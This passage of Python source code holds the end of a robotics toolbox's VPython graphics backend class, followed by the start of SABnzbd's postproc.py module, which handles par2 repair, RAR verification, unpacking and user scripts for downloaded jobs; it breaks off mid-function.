graphical_dh_robot.fkine_and_set(q)
if self.canvases[fig_num].current_mode() == UImode.TEACHPANEL:
# Reload the joint sliders
self.canvases[fig_num].teach_mode(teach=True)
if dt is not None:
sleep(dt)
def reset(self):
"""
Reset the graphical scene
``env.reset()`` triggers a reset of the 3D scene in the browser window
referenced by ``env``. It is restored to the original state defined by
``launch()``.
"""
super().reset()
if len(self.canvases) > 0:
# Clear localhost
self.canvases[0].scene.append_to_caption('''
<script type="text/javascript">
let gs = document.getElementById('glowscript');
gs.innerHTML = '';
</script>
''')
# Delete all sessions
self.canvases = []
self._create_empty_session()
for settings in self.canvas_settings:
# Create the canvas with the given information
if settings[0]:
self.canvases.append(GraphicsCanvas3D(
settings[1], settings[2], settings[3],
settings[4], settings[5], settings[6], settings[7]))
else:
self.canvases.append(GraphicsCanvas2D(
settings[1], settings[2], settings[3],
settings[4], settings[5], settings[6], settings[7]))
def restart(self):
"""
Restart the graphics display
``env.restart()`` triggers a restart of the browser view referenced by
``env``. It is closed and relaunched to the original state defined by
``launch()``.
"""
super().restart()
self.reset()
def close(self):
"""
Close the graphics display
``env.close()`` gracefully closes the browser tab browser view
referenced by ``env``.
"""
super().close()
# Close session
if len(self.canvases) > 0:
# if a canvas made
close_localhost_session(self.canvases[0])
else:
# No canvas, so make one
temp = GraphicsCanvas2D()
close_localhost_session(temp)
self.canvases = []
def add(self, dhrobot, fig_num=0, name=None, **kwargs):
"""
Add a robot to the graphical scene
:param dhrobot: The ``DHRobot`` object (if applicable)
:type dhrobot: class:`~roboticstoolbox.robot.DHRobot.DHRobot`, None
:param fig_num: The canvas number to place the robot in
:type fig_num: int
:param name: The name of the robot
:type name: `str`
:raises ValueError: Figure number must be between 0 and number of
figures created
:return: object id within visualizer
:rtype: int
``id = env.add(robot)`` adds the ``robot`` to the graphical
environment.
.. note::
- ``robot`` must be of an appropriate class.
- Adds the robot object to a list of robots which will be updated
when the ``step()`` method is called.
"""
# TODO - name can come from the robot object, maybe an override name?
# Micah: "Name is used from robot class, unless robot is not given"
# TODO - why dhrobot "if applicable"?
# Micah: "It's possible to create a graphical robot
# in VPython not using a robot class."
# TODO - what about other classes of robot?
# Micah: "I use specific parameters in dhrobots.
# If they exist in other robot classes, it should work."
# TODO - what about adding ellipsoids?
super().add()
if name is None:
name = dhrobot.name
# Sanity check input
if fig_num < 0 or fig_num > len(self.canvases) - 1:
raise ValueError(
"Figure number must be between 0 and number "
"of figures created")
# Add robot to canvas
self.robots.append(
GraphicalRobot(self.canvases[fig_num], name, dhrobot))
# self.canvases[fig_num].add_robot(self.robots[len(self.robots)-1])
def remove(self, id, fig_num=0):
"""
Remove a robot to the graphical scene
:param id: The id of the robot to remove. Can be either the DHLink or
GraphicalRobot
:type id: class:`~roboticstoolbox.robot.DHRobot.DHRobot`,
class:`roboticstoolbox.backends.VPython.graphics_robot.GraphicalRobot`
:param fig_num: The canvas index to delete the robot from, defaults to
the initial one
:type fig_num: int, optional
:raises ValueError: Figure number must be between 0 and total number
of canvases
:raises TypeError: Input must be a DHLink or GraphicalRobot
``env.remove(robot)`` removes the ``robot`` from the graphical
environment.
"""
super().remove()
if fig_num < 0 or fig_num >= len(self.canvases):
raise ValueError(
"Figure number must be between 0 and total number of canvases")
# If DHLink given
if isinstance(id, DHLink):
robot = None
# Find first occurrence of it that is in the correct canvas
for i in range(len(self.robots)):
if self.robots[i].seriallink.equal(id) and \
self.canvases[fig_num].is_robot_in(self.robots[i]):
robot = self.robots[i]
break
if robot is None:
return
else:
self.canvases[fig_num].delete_robot(robot)
# ElseIf GraphicalRobot given
elif isinstance(id, GraphicalRobot):
if self.canvases[fig_num].is_robot_in(id):
self.canvases[fig_num].delete_robot(id)
# Else
else:
raise TypeError("Input must be a DHLink or GraphicalRobot")
def hold(self): # pragma: no cover
'''
hold() keeps the tab open i.e. stops the tab from closing once
the main script has finished.
'''
while True:
pass
def _add_teach_panel(self):
# just need to change the display mode
self.canvases[0].teach_mode(True)
#
# Public non-standard methods
#
def record_start(self, fps, scene_num=0):
"""
Start recording screencaps of a scene
"""
self._thread_lock.acquire()
if not self._recording:
print("VPython Recording...")
if fps > 10:
warnings.warn("The chosen recording fps ({0}) could result in lagging video quality."
"Consider lowering fps and robot speed (e.g. 5fps)".format(fps), RuntimeWarning)
self._recording = True
self._recording_fps = fps
# Spawn a thread
self._recording_thread = threading.Thread(target=self._record_scene, args=(scene_num, fps,))
self._recording_thread.start()
self._thread_lock.release()
def record_stop(self, filename, save_fps=None):
"""
Stop recording screencaps of a scene and combine them into a movie
Save_fps is different to record fps. Will save the media file at the given save fps.
"""
#
self._thread_lock.acquire()
if self._recording:
self._recording = False
print("VPython Recording Stopped...")
print("VPython Recording Saving... DO NOT EXIT")
else:
self._thread_lock.release()
return
self._thread_lock.release()
# Wait for thread to finish
self._recording_thread.join()
sleep(3) # Quick sleep to ensure all downloads are done
# (higher framerates can lag behind)
# Get downloads directory
opsys = platform.system()
if opsys == 'Windows': # Windows
path_in = os.path.join(os.getenv('USERPROFILE'), 'downloads')
elif opsys == 'Linux' or opsys == 'Darwin': # Linux / Mac
path_in = os.path.join(os.getenv('HOME'), 'downloads')
else: # Undefined OS
# lets assume 'HOME' for now
path_in = os.path.join(os.getenv('HOME'), 'downloads')
fp_out = filename
fp_in = path_in + "/vpython_*.png"
files = [file for file in glob.glob(fp_in)]
if save_fps is None:
save_fps = self._recording_fps
writer = imageio.get_writer(fp_out, fps=save_fps)
for f in files:
writer.append_data(imageio.imread(f)) # Add it to the video
os.remove(f) # Clean up file
writer.close()
print("VPython Recording Saved... It is safe to exit")
#
# Private Methods
#
@staticmethod
def _create_empty_session():
"""
Create a canvas to ensure the localhost session has been opened.
Then clear the browser tab
"""
# Create a canvas to initiate the connection
temp = GraphicsCanvas3D()
# Delete the canvas to leave a blank screen
temp.scene.append_to_caption('''
<script type="text/javascript">
let gs = document.getElementById('glowscript');
gs.innerHTML = '';
</script>
''')
def _record_scene(self, scene_num, fps):
"""
Thread-called function to continuously record screenshots
"""
frame_num = 0
if fps <= 0:
raise ValueError("fps must be greater than 0.")
f = 1 / fps
self._thread_lock.acquire()
recording = self._recording
self._thread_lock.release()
while recording:
# Get current time
t_start = perf_counter()
# Take screenshot
filename = "vpython_{:04d}.png".format(frame_num)
self.canvases[scene_num].take_screenshot(filename)
frame_num += 1
# Get current time
t_stop = perf_counter()
# Wait for time of frame to finish
# If saving takes longer than frame frequency, this while is skipped
while t_stop - t_start < f:
t_stop = perf_counter()
self._thread_lock.acquire()
recording = self._recording
self._thread_lock.release()
|
postproc.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2020 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.postproc - threaded post-processing of jobs
"""
import os
import logging
import functools
import subprocess
import time
import re
import queue
from typing import List, Optional
import sabnzbd
from sabnzbd.newsunpack import (
unpack_magic,
par2_repair,
external_processing,
sfv_check,
build_filelists,
rar_sort,
is_sfv_file,
)
from threading import Thread
from sabnzbd.misc import on_cleanup_list
from sabnzbd.filesystem import (
real_path,
get_unique_path,
move_to_path,
make_script_path,
long_path,
clip_path,
renamer,
remove_dir,
globber,
globber_full,
set_permissions,
cleanup_empty_directories,
fix_unix_encoding,
sanitize_and_trim_path,
sanitize_files_in_folder,
remove_file,
listdir_full,
setname_from_path,
create_all_dirs,
get_unique_filename,
get_ext,
get_filename,
)
from sabnzbd.nzbstuff import NzbObject
from sabnzbd.sorting import Sorter
from sabnzbd.constants import (
REPAIR_PRIORITY,
FORCE_PRIORITY,
POSTPROC_QUEUE_FILE_NAME,
POSTPROC_QUEUE_VERSION,
sample_match,
JOB_ADMIN,
Status,
VERIFIED_FILE,
)
from sabnzbd.nzbparser import process_single_nzb
import sabnzbd.emailer as emailer
import sabnzbd.downloader
import sabnzbd.config as config
import sabnzbd.cfg as cfg
import sabnzbd.encoding as encoding
import sabnzbd.nzbqueue
import sabnzbd.database as database
import sabnzbd.notifier as notifier
import sabnzbd.utils.rarfile as rarfile
import sabnzbd.utils.rarvolinfo as rarvolinfo
import sabnzbd.utils.checkdir
import sabnzbd.deobfuscate_filenames as deobfuscate
MAX_FAST_JOB_COUNT = 3
# Match samples
RE_SAMPLE = re.compile(sample_match, re.I)
class PostProcessor(Thread):
""" PostProcessor thread, designed as Singleton """
def __init__(self):
""" Initialize PostProcessor thread """
Thread.__init__(self)
# This history queue is simply used to log what active items to display in the web_ui
self.history_queue: List[NzbObject] = []
self.load()
# Fast-queue for jobs already finished by DirectUnpack
self.fast_queue: queue.Queue[Optional[NzbObject]] = queue.Queue()
# Regular queue for jobs that might need more attention
self.slow_queue: queue.Queue[Optional[NzbObject]] = queue.Queue()
# Load all old jobs
for nzo in self.history_queue:
self.process(nzo)
# So we can always cancel external processes
self.external_process: Optional[subprocess.Popen] = None
# Counter to not only process fast-jobs
self.__fast_job_count = 0
# State variables
self.__stop = False
self.__busy = False
self.paused = False
def save(self):
""" Save postproc queue """
logging.info("Saving postproc queue")
sabnzbd.save_admin((POSTPROC_QUEUE_VERSION, self.history_queue), POSTPROC_QUEUE_FILE_NAME)
def load(self):
""" Save postproc queue """
logging.info("Loading postproc queue")
data = sabnzbd.load_admin(POSTPROC_QUEUE_FILE_NAME)
if data is None:
return
try:
version, history_queue = data
if POSTPROC_QUEUE_VERSION != version:
logging.warning(T("Old queue detected, use Status->Repair to convert the queue"))
elif isinstance(history_queue, list):
self.history_queue = [nzo for nzo in history_queue if os.path.exists(nzo.download_path)]
except:
logging.info("Corrupt %s file, discarding", POSTPROC_QUEUE_FILE_NAME)
logging.info("Traceback: ", exc_info=True)
def delete(self, nzo_id, del_files=False):
""" Remove a job from the post processor queue """
for nzo in self.history_queue:
if nzo.nzo_id == nzo_id:
if nzo.status in (Status.FAILED, Status.COMPLETED):
nzo.to_be_removed = True
elif nzo.status in (Status.DOWNLOADING, Status.QUEUED):
self.remove(nzo)
nzo.purge_data(delete_all_data=del_files)
logging.info("Removed job %s from postproc queue", nzo.final_name)
nzo.work_name = "" # Mark as deleted job
break
def process(self, nzo: NzbObject):
""" Push on finished job in the queue """
# Make sure we return the status "Waiting"
nzo.status = Status.QUEUED
if nzo not in self.history_queue:
self.history_queue.append(nzo)
# Fast-track if it has DirectUnpacked jobs or if it's still going
if nzo.direct_unpacker and (nzo.direct_unpacker.success_sets or not nzo.direct_unpacker.killed):
self.fast_queue.put(nzo)
else:
self.slow_queue.put(nzo)
self.save()
sabnzbd.history_updated()
def remove(self, nzo: NzbObject):
""" Remove given nzo from the queue """
try:
self.history_queue.remove(nzo)
except:
pass
self.save()
sabnzbd.history_updated()
def stop(self):
""" Stop thread after finishing running job """
self.__stop = True
self.slow_queue.put(None)
self.fast_queue.put(None)
def cancel_pp(self, nzo_id):
""" Change the status, so that the PP is canceled """
for nzo in self.history_queue:
if nzo.nzo_id == nzo_id:
nzo.abort_direct_unpacker()
if nzo.pp_active:
nzo.pp_active = False
try:
# Try to kill any external running process
self.external_process.kill()
logging.info("Killed external process %s", self.external_process.args[0])
except:
pass
return True
return None
def empty(self):
""" Return True if pp queue is empty """
return self.slow_queue.empty() and self.fast_queue.empty() and not self.__busy
def get_queue(self):
""" Return list of NZOs that still need to be processed """
return [nzo for nzo in self.history_queue if nzo.work_name]
def get_path(self, nzo_id):
""" Return download path for given nzo_id or None when not found """
for nzo in self.history_queue:
if nzo.nzo_id == nzo_id:
return nzo.download_path
return None
def run(self):
""" Postprocessor loop """
# First we do a dircheck
complete_dir = sabnzbd.cfg.complete_dir.get_path()
if sabnzbd.utils.checkdir.isFAT(complete_dir):
logging.warning_helpful(
T("Completed Download Folder %s is on FAT file system, limiting maximum file size to 4GB")
% complete_dir
)
else:
logging.info("Completed Download Folder %s is not on FAT", complete_dir)
# Start looping
check_eoq = False
while not self.__stop:
self.__busy = False
if self.paused:
time.sleep(5)
continue
# Set NzbObject object to None so references from this thread do not keep the
# object alive until the next job is added to post-processing (see #1628)
nzo = None
# Something in the fast queue?
try:
# Every few fast-jobs we should check allow a
# slow job so that they don't wait forever
if self.__fast_job_count >= MAX_FAST_JOB_COUNT and self.slow_queue.qsize():
raise queue.Empty
nzo = self.fast_queue.get(timeout=2)
self.__fast_job_count += 1
except queue.Empty:
# Try the slow queue
try:
nzo = self.slow_queue.get(timeout=2)
# Reset fast-counter
self.__fast_job_count = 0
except queue.Empty:
# Check for empty queue
if check_eoq:
check_eoq = False
handle_empty_queue()
# No fast or slow jobs, better luck next loop!
continue
# Stop job
if not nzo:
continue
# Job was already deleted.
if not nzo.work_name:
check_eoq = True
continue
# Flag NZO as being processed
nzo.pp_active = True
# Pause downloader, if users wants that
if cfg.pause_on_post_processing():
sabnzbd.Downloader.wait_for_postproc()
self.__busy = True
process_job(nzo)
if nzo.to_be_removed:
with database.HistoryDB() as history_db:
history_db.remove_history(nzo.nzo_id)
nzo.purge_data()
# Processing done
nzo.pp_active = False
self.remove(nzo)
self.external_process = None
check_eoq = True
# Allow download to proceed
sabnzbd.Downloader.resume_from_postproc()
def process_job(nzo: NzbObject):
""" Process one job """
start = time.time()
# keep track of whether we can continue
all_ok = True
# keep track of par problems
par_error = False
# keep track of any unpacking errors
unpack_error = False
# Signal empty download, for when 'empty_postproc' is enabled
empty = False
nzb_list = []
# These need to be initialized in case of a crash
workdir_complete = ""
script_log = ""
script_line = ""
# Get the job flags
nzo.save_attribs()
flag_repair, flag_unpack, flag_delete = nzo.repair_opts
# Normalize PP
if flag_delete:
flag_unpack = True
if flag_unpack:
flag_repair = True
# Get the NZB name
filename = nzo.final_name
# Download-processes can mark job as failed, skip all steps
if nzo.fail_msg:
all_ok = False
par_error = True
unpack_error = 1
try:
# Get the folder containing the download result
workdir = nzo.download_path
tmp_workdir_complete = None
# if no files are present (except __admin__), fail the job
if all_ok and len(globber(workdir)) < 2:
if nzo.precheck:
_, ratio = nzo.check_availability_ratio()
emsg = T("Download might fail, only %s of required %s available") % (ratio, cfg.req_completion_rate())
else:
emsg = T("Download failed - Not on your server(s)")
empty = True
emsg += " - https://sabnzbd.org/not-complete"
nzo.fail_msg = emsg
nzo.set_unpack_info("Download", emsg)
nzo.status = Status.FAILED
# do not run unpacking or parity verification
flag_repair = flag_unpack = False
all_ok = cfg.empty_postproc() and empty
if not all_ok:
par_error = True
unpack_error = 1
script = nzo.script
logging.info(
"Starting Post-Processing on %s => Repair:%s, Unpack:%s, Delete:%s, Script:%s, Cat:%s",
filename,
flag_repair,
flag_unpack,
flag_delete,
script,
nzo.cat,
)
# Set complete dir to workdir in case we need to abort
workdir_complete = workdir
# Send post-processing notification
notifier.send_notification(T("Post-processing"), nzo.final_name, "pp", nzo.cat)
# Par processing, if enabled
if all_ok and flag_repair:
par_error, re_add = parring(nzo, workdir)
if re_add:
# Try to get more par files
return False
# If we don't need extra par2, we can disconnect
if sabnzbd.NzbQueue.actives(grabs=False) == 0 and cfg.autodisconnect():
# This was the last job, close server connections
sabnzbd.Downloader.disconnect()
# Sanitize the resulting files
if sabnzbd.WIN32:
sanitize_files_in_folder(workdir)
# Check if user allows unsafe post-processing
if flag_repair and cfg.safe_postproc():
all_ok = all_ok and not par_error
if all_ok:
# Fix encodings
fix_unix_encoding(workdir)
# Use dirs generated by direct-unpacker
if nzo.direct_unpacker and nzo.direct_unpacker.unpack_dir_info:
(
tmp_workdir_complete,
workdir_complete,
file_sorter,
one_folder,
marker_file,
) = nzo.direct_unpacker.unpack_dir_info
else:
# Generate extraction path
tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file = prepare_extraction_path(
nzo
)
newfiles = []
# Run Stage 2: Unpack
if flag_unpack:
# Set the current nzo status to "Extracting...". Used in History
nzo.status = Status.EXTRACTING
logging.info("Running unpack_magic on %s", filename)
unpack_error, newfiles = unpack_magic(
nzo, workdir, tmp_workdir_complete, flag_delete, one_folder, (), (), (), (), ()
)
logging.info("Unpacked files %s", newfiles)
if sabnzbd.WIN32:
# Sanitize the resulting files
newfiles = sanitize_files_in_folder(tmp_workdir_complete)
logging.info("Finished unpack_magic on %s", filename)
if cfg.safe_postproc():
all_ok = all_ok and not unpack_error
if all_ok:
# Move any (left-over) files to destination
nzo.status = Status.MOVING
nzo.set_action_line(T("Moving"), "...")
for root, _dirs, files in os.walk(workdir):
if not root.endswith(JOB_ADMIN):
for file_ in files:
path = os.path.join(root, file_)
new_path = path.replace(workdir, tmp_workdir_complete)
ok, new_path = move_to_path(path, new_path)
if new_path:
newfiles.append(new_path)
if not ok:
nzo.set_unpack_info("Unpack", T("Failed moving %s to %s") % (path, new_path))
all_ok = False
break
# Set permissions right
set_permissions(tmp_workdir_complete)
if all_ok and marker_file:
del_marker(os.path.join(tmp_workdir_complete, marker_file))
remove_from_list(marker_file, newfiles)
if all_ok:
# Remove files matching the cleanup list
cleanup_list(tmp_workdir_complete, skip_nzb=True)
# Check if this is an NZB-only download, if so redirect to queue
# except when PP was Download-only
if flag_repair:
nzb_list = nzb_redirect(tmp_workdir_complete, nzo.final_name, nzo.pp, script, nzo.cat, nzo.priority)
else:
nzb_list = None
if nzb_list:
nzo.set_unpack_info("Download", T("Sent %s to queue") % nzb_list)
cleanup_empty_directories(tmp_workdir_complete)
else:
# Full cleanup including nzb's
cleanup_list(tmp_workdir_complete, skip_nzb=False)
script_output = ""
script_ret = 0
if not nzb_list:
# Give destination its final name
if cfg.folder_rename() and tmp_workdir_complete and not one_folder:
if not all_ok:
# Rename failed folders so they are easy to recognize
workdir_complete = tmp_workdir_complete.replace("_UNPACK_", "_FAILED_")
workdir_complete = get_unique_path(workdir_complete, create_dir=False)
try:
newfiles = rename_and_collapse_folder(tmp_workdir_complete, workdir_complete, newfiles)
except:
logging.error(
T('Error renaming "%s" to "%s"'),
clip_path(tmp_workdir_complete),
clip_path(workdir_complete),
)
logging.info("Traceback: ", exc_info=True)
# Better disable sorting because filenames are all off now
file_sorter.sort_file = None
if empty:
job_result = -1
else:
job_result = int(par_error) + int(bool(unpack_error)) * 2
if cfg.ignore_samples():
remove_samples(workdir_complete)
# TV/Movie/Date Renaming code part 2 - rename and move files to parent folder
if all_ok and file_sorter.sort_file:
if newfiles:
file_sorter.rename(newfiles, workdir_complete)
workdir_complete, ok = file_sorter.move(workdir_complete)
else:
workdir_complete, ok = file_sorter.rename_with_ext(workdir_complete)
if not ok:
nzo.set_unpack_info("Unpack", T("Failed to move files"))
all_ok = False
if cfg.deobfuscate_final_filenames() and all_ok and not nzb_list:
# Deobfuscate the filenames
logging.info("Running deobfuscate")
deobfuscate.deobfuscate_list(newfiles, nzo.final_name)
# Run the user script
script_path = make_script_path(script)
if (all_ok or not cfg.safe_postproc()) and (not nzb_list) and script_path:
# Set the current nzo status to "Ext Script...". Used in History
nzo.status = Status.RUNNING
nzo.set_action_line(T("Running script"), script)
nzo.set_unpack_info("Script", T("Running user script %s") % script, unique=True)
script_log, script_ret = external_processing(
script_path, nzo, clip_path(workdir_complete), nzo.final_name, job_result
)
script_line = get_last_line(script_log)
if script_log:
script_output = nzo.nzo_id
if script_line:
nzo.set_unpack_info("Script", script_line, unique=True)
else:
nzo.set_unpack_info("Script", T("Ran %s") % script, unique=True)
else:
script = ""
script_line = ""
script_ret = 0
# Maybe bad script result should fail job
if script_ret and cfg.script_can_fail():
script_error = True
all_ok = False
nzo.fail_msg = T("Script exit code is %s") % script_ret
else:
script_error = False
# Email the results
if (not nzb_list) and cfg.email_endjob():
if (cfg.email_endjob() == 1) or (cfg.email_endjob() == 2 and (unpack_error or par_error or script_error)):
emailer.endjob(
nzo.final_name,
nzo.cat,
all_ok,
workdir_complete,
nzo.bytes_downloaded,
nzo.fail_msg,
nzo.unpack_info,
script,
script_log,
script_ret,
)
if script_output:
# Can do this only now, otherwise it would show up in the email
if script_ret:
script_ret = "Exit(%s) " % script_ret
else:
script_ret = ""
if len(script_log.rstrip().split("\n")) > 1:
nzo.set_unpack_info(
"Script",
'%s%s <a href="./scriptlog?name=%s">(%s)</a>'
% (script_ret, script_line, encoding.xml_name(script_output), T("More")),
unique=True,
)
else:
# No '(more)' button needed
nzo.set_unpack_info("Script", "%s%s " % (script_ret, script_line), unique=True)
# Cleanup again, including NZB files
if all_ok:
cleanup_list(workdir_complete, False)
# Force error for empty result
all_ok = all_ok and not empty
# Update indexer with results
if cfg.rating_enable():
if nzo.encrypted > 0:
sabnzbd.Rating.update_auto_flag(nzo.nzo_id, sabnzbd.Rating.FLAG_ENCRYPTED)
if empty:
hosts = [s.host for s in sabnzbd.Downloader.nzo_servers(nzo)]
if not hosts:
hosts = [None]
for host in hosts:
sabnzbd.Rating.update_auto_flag(nzo.nzo_id, sabnzbd.Rating.FLAG_EXPIRED, host)
except:
logging.error(T("Post Processing Failed for %s (%s)"), filename, T("see logfile"))
logging.info("Traceback: ", exc_info=True)
nzo.fail_msg = T("Post-processing was aborted")
notifier.send_notification(T("Download Failed"), filename, "failed", nzo.cat)
nzo.status = Status.FAILED
par_error = True
all_ok = False
if cfg.email_endjob():
emailer.endjob(
nzo.final_name,
nzo.cat,
all_ok,
clip_path(workdir_complete),
nzo.bytes_downloaded,
nzo.fail_msg,
nzo.unpack_info,
"",
"",
0,
)
if all_ok:
# If the folder only contains one file OR folder, have that as the path
# Be aware that series/generic/date sorting may move a single file into a folder containing other files
workdir_complete = one_file_or_folder(workdir_complete)
workdir_complete = os.path.normpath(workdir_complete)
# Clean up the NZO data
try:
nzo.purge_data(delete_all_data=all_ok)
except:
logging.error(T("Cleanup of %s failed."), nzo.final_name)
logging.info("Traceback: ", exc_info=True)
# Use automatic retry link on par2 errors and encrypted/bad RARs
if par_error or unpack_error in (2, 3):
try_alt_nzb(nzo)
# Check if it was aborted
if not nzo.pp_active:
nzo.fail_msg = T("Post-processing was aborted")
all_ok = False
# Show final status in history
if all_ok:
notifier.send_notification(T("Download Completed"), filename, "complete", nzo.cat)
nzo.status = Status.COMPLETED
else:
notifier.send_notification(T("Download Failed"), filename, "failed", nzo.cat)
nzo.status = Status.FAILED
# Log the overall time taken for postprocessing
postproc_time = int(time.time() - start)
with database.HistoryDB() as history_db:
# Add the nzo to the database. Only the path, script and time taken is passed
# Other information is obtained from the nzo
history_db.add_history_db(nzo, workdir_complete, postproc_time, script_log, script_line)
# Purge items
history_db.auto_history_purge()
sabnzbd.history_updated()
return True
def prepare_extraction_path(nzo: NzbObject):
"""Based on the information that we have, generate
the extraction path and create the directory.
Separated so it can be called from DirectUnpacker
"""
one_folder = False
marker_file = None
# Determine class directory
catdir = config.get_category(nzo.cat).dir()
if catdir.endswith("*"):
catdir = catdir.strip("*")
one_folder = True
complete_dir = real_path(cfg.complete_dir.get_path(), catdir)
complete_dir = long_path(complete_dir)
# TV/Movie/Date Renaming code part 1 - detect and construct paths
if cfg.enable_meta():
file_sorter = Sorter(nzo, nzo.cat)
else:
file_sorter = Sorter(None, nzo.cat)
complete_dir = file_sorter.detect(nzo.final_name, complete_dir)
if file_sorter.sort_file:
one_folder = False
complete_dir = sanitize_and_trim_path(complete_dir)
if one_folder:
workdir_complete = create_all_dirs(complete_dir, apply_umask=True)
else:
workdir_complete = get_unique_path(os.path.join(complete_dir, nzo.final_name), create_dir=True)
marker_file = set_marker(workdir_complete)
if not workdir_complete or not os.path.exists(workdir_complete):
logging.error(T("Cannot create final folder %s") % os.path.join(complete_dir, nzo.final_name))
raise IOError
if cfg.folder_rename() and not one_folder:
prefixed_path = prefix(workdir_complete, "_UNPACK_")
tmp_workdir_complete = get_unique_path(prefix(workdir_complete, "_UNPACK_"), create_dir=False)
try:
renamer(workdir_complete, tmp_workdir_complete)
except:
pass # On failure, just use the original name
# Is the unique path different? Then we also need to modify the final path
if prefixed_path != tmp_workdir_complete:
workdir_complete = workdir_complete + os.path.splitext(tmp_workdir_complete)[1]
else:
tmp_workdir_complete = workdir_complete
return tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file
def parring(nzo: NzbObject, workdir: str):
""" Perform par processing. Returns: (par_error, re_add) """
logging.info("Starting verification and repair of %s", nzo.final_name)
par_error = False
re_add = False
# Get verification status of sets
verified = sabnzbd.load_data(VERIFIED_FILE, nzo.admin_path, remove=False) or {}
# If all were verified successfully, we skip the rest of the checks
if verified and all(verified.values()):
logging.info("Skipping repair, all sets previously verified: %s", verified)
return par_error, re_add
if nzo.extrapars:
# Need to make a copy because it can change during iteration
single = len(nzo.extrapars) == 1
for setname in list(nzo.extrapars):
if cfg.ignore_samples() and RE_SAMPLE.search(setname.lower()):
continue
# Skip sets that were already tried
if not verified.get(setname, False):
logging.info("Running verification and repair on set %s", setname)
parfile_nzf = nzo.partable[setname]
# Check if file maybe wasn't deleted and if we maybe have more files in the parset
if os.path.exists(os.path.join(nzo.download_path, parfile_nzf.filename)) or nzo.extrapars[setname]:
need_re_add, res = par2_repair(parfile_nzf, nzo, workdir, setname, single=single)
re_add = re_add or need_re_add
verified[setname] = res
else:
continue
par_error = par_error or not res
elif not verified.get("", False):
# No par2-sets found, skipped if already tried before
logging.info("No par2 sets for %s", nzo.final_name)
nzo.set_unpack_info("Repair", T("[%s] No par2 sets") % nzo.final_name)
# Try SFV-based verification and rename
sfv_check_result = None
if cfg.sfv_check() and not verified.get("", False):
sfv_check_result = try_sfv_check(nzo, workdir)
par_error = sfv_check_result is False
# If no luck with SFV, do RAR-check or RAR-rename
if sfv_check_result is None and cfg.enable_unrar():
# Check for RAR's with a sensible extension
_, _, rars, _, _ = build_filelists(workdir, check_rar=False)
# If there's no RAR's, they might be super-obfuscated
if not rars:
# Returns number of renamed RAR's
if rar_renamer(nzo, workdir):
# Re-parse the files so we can do RAR-check
_, _, rars, _, _ = build_filelists(workdir)
if rars:
par_error = not try_rar_check(nzo, rars)
# Save that we already tried SFV/RAR-verification
verified[""] = not par_error
if re_add:
logging.info("Re-added %s to queue", nzo.final_name)
if nzo.priority != FORCE_PRIORITY:
nzo.priority = REPAIR_PRIORITY
nzo.status = Status.FETCHING
sabnzbd.NzbQueue.add(nzo)
sabnzbd.Downloader.resume_from_postproc()
sabnzbd.save_data(verified, VERIFIED_FILE, nzo.admin_path)
logging.info("Verification and repair finished for %s", nzo.final_name)
return par_error, re_add
def try_sfv_check(nzo: NzbObject, workdir):
"""Attempt to verify set using SFV file
Return None if no SFV-sets, True/False based on verification
"""
# Get list of SFV names
sfvs = globber_full(workdir, "*.sfv")
# If no files named *.sfv, lets search for obfuscated SFV files
if not sfvs:
files = globber_full(workdir, "*")
for file in files:
if is_sfv_file(file):
logging.debug("Found and will use obfuscated SFV file: %s", file)
sfvs.append(file)
if not sfvs:
# still no SFV, so:
return None
result = sfv_check(sfvs, nzo, workdir)
if not result:
print_sfv = [os.path.basename(sfv) for sfv in sfvs]
fail_msg = T('Some files failed to verify against "%s"') % "; ".join(print_sfv)
nzo.set_unpack_info("Repair", fail_msg)
nzo.status = Status.FAILED
nzo.fail_msg = fail_msg
return False
# Success
nzo.set_unpack_info("Repair", T("Verified successfully using SFV files"))
return True
def try_rar_check(nzo: NzbObject, rars):
"""Attempt to verify set using the RARs
Return True if verified, False when failed
When setname is '', all RAR files will be used, otherwise only the matching one
If no RAR's are found, returns True
"""
# Sort for better processing
rars.sort(key=functools.cmp_to_key(rar_sort))
# Test
if rars:
setname = setname_from_path(rars[0])
nzo.status = Status.VERIFYING
nzo.set_unpack_info("Repair", T("Trying RAR-based verification"), setname)
nzo.set_action_line(T("Trying RAR-based verification"), "...")
try:
# Set path to unrar and open the file
# Requires de-unicode for RarFile to work!
rarfile.UNRAR_TOOL = sabnzbd.newsunpack.RAR_COMMAND
zf = rarfile.RarFile(rars[0])
# Skip if it's encrypted
if zf.needs_password():
msg = T("[%s] RAR-based verification failed: %s") % (setname, T("Passworded"))
nzo.set_unpack_info("Repair", msg)
return True
# Will throw exception if something is wrong
zf.testrar()
# Success!
msg = T("RAR files verified successfully")
nzo.set_unpack_info("Repair", msg, setname)
logging.info(msg)
return True
except rarfile.Error as e:
nzo.fail_msg = T("RAR files failed to verify")
msg = T("[%s] RAR-based verification failed: %s") % (setname, e)
nzo.set_unpack_info("Repair", msg, setname)
logging.info(msg)
return False
else:
# No rar-files, so just continue
return True
def rar_renamer(nzo: NzbObject, workdir):
""" Deobfuscate rar file names: Use header and content information to give RAR-files decent names """
nzo.status = Status.VERIFYING
nzo.set_unpack_info("Repair", T("Trying RAR-based verification"))
nzo.set_action_line(T("Trying RAR-based verification"), "...")
renamed_files = 0
# This is the most important datastructure (in case of mixed obfuscated rarsets)
rarvolnr = {}
# rarvolnr will contain per rar vol number the rarfilenames and their respective contents (and maybe other characteristics, like filesizes).
# for example: rarvolnr[6]['somerandomfilename.rar']={'readme.txt', 'linux.iso'},
# which means 'somerandomfilename.rar' has rarvolnumber 6, and contents 'readme.txt' and 'linux.iso'
# if we find a rarfile with rarvolnumber 7, and 'linux.iso' in it, we have a match!
# The volume number and real extension of a (obfuscated) rar file
# so volnrext['dfakjldfalkjdfl.blabla'] = (14, 'part014.rar') or (2, 'r000')
# Not really needed, but handy to avoid a second lookup at the renaming
volnrext = {}
# Scan rar files in workdir, but not subdirs
workdir_files = os.listdir(workdir)
for file_to_check in workdir_files:
file_to_check = os.path.join(workdir, file_to_check)
# We only want files:
